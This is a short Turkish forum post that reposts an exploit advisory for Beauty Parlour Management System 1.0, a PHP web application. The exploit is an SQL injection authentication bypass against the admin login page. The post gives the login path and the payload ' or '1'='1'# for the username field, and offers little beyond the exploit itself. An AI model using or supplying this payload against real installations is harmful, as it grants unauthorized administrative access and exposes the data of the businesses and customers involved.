Hoşgeldin Misafir

Beauty Parlour Management System 1.0 - Authentication Bypass Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Beauty Parlour Management System 1.0 - Authentication Bypass Vulnerability--


Kod:
# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
# Exploit Author: Prof. Kailas PATIL  (krp)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
# Version: v1.0
# Category: Webapps
# Tested on: LAMP for Linux
 
# Description:
# Password and username parameters have sql injection vulnerability in Admin login panel.
# 
#------------------------------------------------------
# 
# Login Link:  http://localhost/bpms/admin/index.php
#       username: ' or '1'='1'#  
#       password: blah123
# 
#------------------------------------------------------
 
#  0day.today [2020-06-20]  #